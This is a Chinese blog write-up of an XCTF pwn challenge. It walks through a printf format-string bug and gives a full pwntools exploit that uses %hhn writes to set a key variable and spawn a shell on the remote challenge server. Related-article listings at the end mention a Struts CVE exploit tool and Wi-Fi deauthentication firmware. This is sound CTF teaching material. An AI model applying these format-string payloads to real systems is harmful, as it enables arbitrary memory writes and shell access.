pwn刷题num15----格式化字符串漏洞

最新推荐文章于 2024-01-19 18:51:02 发布
最新推荐文章于 2024-01-19 18:51:02 发布
阅读量346 收藏
点赞数
分类专栏: 攻防世界 pwn CTF 文章标签: 系统安全 python 网络安全 c语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124354847
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
攻防世界
17 篇文章 0 订阅
订阅专栏

攻防世界pwn进阶区实时数据监测

在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行

在这里插入图片描述

	64位,小端序
	开启部分RELRO---got表仍可写
	未开启canary保护---存在栈溢出
	未开启NX保护----堆栈可执行
	未开启PIE----程序地址为真实地址
	动态链接

运行程序给了这一条信息

	The location of key is 0804a048, and its value is 00000000,not the 0x02223322. (╯°Д°)╯︵ ┻━┻

ida看一下伪代码,主函数调用一个子函数locker()
在这里插入图片描述
在这里插入图片描述
查看locker函数,第一眼看到system(‘/bin/sh’),要执行这条代码,需要key为0x2223322,如何将key修改为0x2223322,发现这里有个函数imagemagic(&s);
在这里插入图片描述
发现就是printf,而且只有一个参数,存在格式化字符串漏洞,
该参数就是我们输入的字符串

fgets(&s, 0x200, stdin);

思路

  fgets(&s, 0x200, stdin);
  imagemagic(&s);

利用这两个函数,写入格式化字符串,并将key的值改为0x2223322。
首先找到key地址(0x804A048)
在这里插入图片描述
这里要改写的数值0x2223322远远大于字符串s大小(0x208),所以属于覆盖大数字,应逐字节覆盖四个单字节地址
数据为0x22,0x33,0x22,0x02(从低地址到高地址)
还需要先找到输入的格式化字符串位于printf的第几个参数,
在这里插入图片描述

0xf7fd5b24..0xffa73af4..(nil)..0xf7f8f000..0xf7f8f000..0xffa73aa8..0x80484e7..0xffa738a0..0x200..0xf7f8f580..0xf7fb7ea4..0x61616161

数一下位于第12个参数
exp

from pwn import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'i386')
sh = remote('111.200.241.244',57639)
key_addr = 0x0804A048  # 将key修改成0x02223322
payload = flat([p32(key_addr),p32(key_addr+1),p32(key_addr+3),p32(key_addr+2),'%18x','%12$hhn', '%17x','%13$hhn','%207x','%14$hhn','%32x','%15$hhn'])
sh.sendline(payload)
sh.interactive()

这里的payload

payload = flat([p32(key_addr),p32(key_addr+1),p32(key_addr+3),p32(key_addr+2),'%18x','%12$hhn', '%17x','%13$hhn','%207x','%14$hhn','%32x','%15$hhn'])

前四个地址是key(4个字节)从低地址到高地址四个字节的的地址,但把最高位字节地址和倒数第二高位字节换了一下顺序(减小了注入字符串的大小)共占16字节,而要将key的最低地址字节改为0x22(即34),所以需要加上18(34-16)字节(%18x),后面加上17字节(%17x),总共0x33(34+17=51)字节,
再加上207字节(%207x),总共0x102(207+51=258)字节,因为是hhn单字节,所以只取后两位为0x02,再加上32(%32x),为0x122(258+32)字节,取后两位为0x22,
运行获得shell
在这里插入图片描述
参考
格式化字符串漏洞

tbsqigongzi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn 格式化字符串漏洞
清霂的博客
03-10 443
7.cgpwn2 file checksec ida32
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
PWN格式化字符串漏洞
WateranFire的博客
07-19 647
漏洞使用:     1.泄露canary之类的信息     2.修改特定地址的内容 hints:      1.当需要表示第N个参数时,可以通过"%N$llx"的方法实现;      2.当利用%n修改数据时,如果数据较大,可以前面利用"%099999d"来构造。  ...
pwnnum10-----格式化字符串漏洞
tbsqigongzi的博客
04-22 354
攻防世界pwn新手区string 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启全部RELRO---got表不可写 开启canary保护---栈溢出需绕过canary 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 英文意思是:我们是巫师,我们会给你手,你不能自己打败龙...... 我们会告诉你两个秘密......秘密 [0]是6662a0秘密[1]是6662a4 不要告诉任何人 你的
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 1734
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
[PWN]——格式化字符串漏洞(包含几种解方法)
最新发布
ysy___ysy的博客
01-19 1912
如果要自己采用"%x$n"的方式手动构造payload容易出错,所以使用pwntools中的FmtStr格式化字符串类来解决格式化字符串漏洞比较方便做。如果有什么错误的地方请师傅们告诉我一下。本文制作不易,盗版必究。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
pwn 格式化字符串漏洞及例
limenzzz的博客
10-21 1807
一些输出函数例如printf,sprintf都接受参数输入,例如printf("%d",s)。但如果在编写函数时为方便写为printf(s),则可通过对s输入的构造来执行一些操作。 在其中常见的有通过-%p %08x等参数来查看偏移值,简单来说,就是输入的值存在于栈的哪个地方。
CTFshow PWN 格式化字符串漏洞pwn10
Rt1Text的博客
03-27 584
checksec+运行 就是这个样子 确实还需要学习啊 KEEP LEARNING!!!!!! 32位 NX保护 ida进行中 if num == 16 即可cat flag 那么修改变量的值 明显的格式化字符串漏洞 确定参数位置 第7个 num跟进去 address=0x804A030 准备exp from pwn import* p=process('./pwn10') num_addr=0x804A030 payload=p32(num_add..
CTF(pwn)-格式化字符串漏洞讲解(一)
半岛铁盒的博客
02-25 849
一、基本介绍 格式化字符串漏洞在通用漏洞类型库CWE中的编号是134,其解释为“软件使用了格式化字符串作为参数,且该格式化字符串来自外部输入”。会触发该漏洞的函数很有限,主要就是printf、sprintf、fprintf等print家族函数。 printf()函数的一般形式为printf(“格式化字符串”,参数…),其第一个参数就是格式化字符串,用来告诉程序以什么格式进行输出。 它的参数是由格式化说明符与字符串组成的,通过格式化说明符来规定参数用什么格式输出内容。 格式化说明符有这些: %d - 十进制
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5776
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串
PWN格式化字符串漏洞原理
u014377094的博客
05-21 1575
今天做Dest0g3 520迎新赛的dest_love,发现是格式化字符串,但是由于其内容保存在了bss区,导致无法像过去那样简单利用,坐牢半天没做出来,但恰巧遇到了,就复习一下格式化字符串漏洞的基本原理吧,顺便补一下过去基本功不扎实的问 首先是格式化字符串漏洞长啥样子 printf(format); //format是一个字符串 如何触发? 一般来说通过%p泄露内容,通过%n来写内容。 %p也可用%08x(32位)替代,不过还是推荐%p,因为%p无需考虑32还是64的问。 t
格式化字符漏洞
IT_huanhuan的博客
05-25 1077
格式化字符串是由普通字符(包括%)和转换规则构成的字符序列。普通字符被原封不动地复制到输出流中。转换规则根据与实参对应的转换指示符对其进行转换,然后将结果写入到输出流中。转换规则由可选的部分和必选部分组成。其中只有转换指示符type是必选部分,用来表示转换类型。用 printf() 为例,它的第一个参数就是格式化字符串 :“Color %s,Number %d,Float %4.2f”然后 printf 函数会根据这个格式化字符串来解析对应的其他参数。
pwnnum8---格式化字符串漏洞
tbsqigongzi的博客
04-21 237
攻防世界pwn新手区CGfsb 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位,小端序 开启部分RELRO—got表仍可写 开启canary保护—栈溢出需绕过canary 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 ida查看伪代码 观察主函数,发现printf(%s)存在格式化字符串漏洞 还发现存在 system(“cat flag”),执行这条语句就可以获得flag 前提是有个if语句,需要pwnme为
64位格式化字符串漏洞pwn入门
z2876563的博客
08-10 1750
CTF竞赛权威指南PWN篇第166页参考程序 如下程序有格式化字符串漏洞,原文是编译成32位程序,为了增加难度,我编译成64位程序。以下我通过漏洞实现输入arg4的地址获取arg4的内容即ABCD。 //fmtdemo.c -o #include<stdio.h> void main() { char format[128]; int arg1 =1,arg2=0x88888882,arg3=-1; char arg4[10]="ABCD"; scanf("%s
利用格式化字符串漏洞实现任意地址读写
个人笔记
06-01 3277
理解格式化字符串漏洞关键还是在于理解栈空间布局,任意地址写初学者接触到可能较为抽象,但是结合栈空间布局以及格式化字符串的原理,详细我们就能对格式化字符串有个更加清晰的认知。如果能够复现上述漏洞案例,那么恭喜你,已经完成了 pwn 格式化字符串漏洞这一旅程。
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值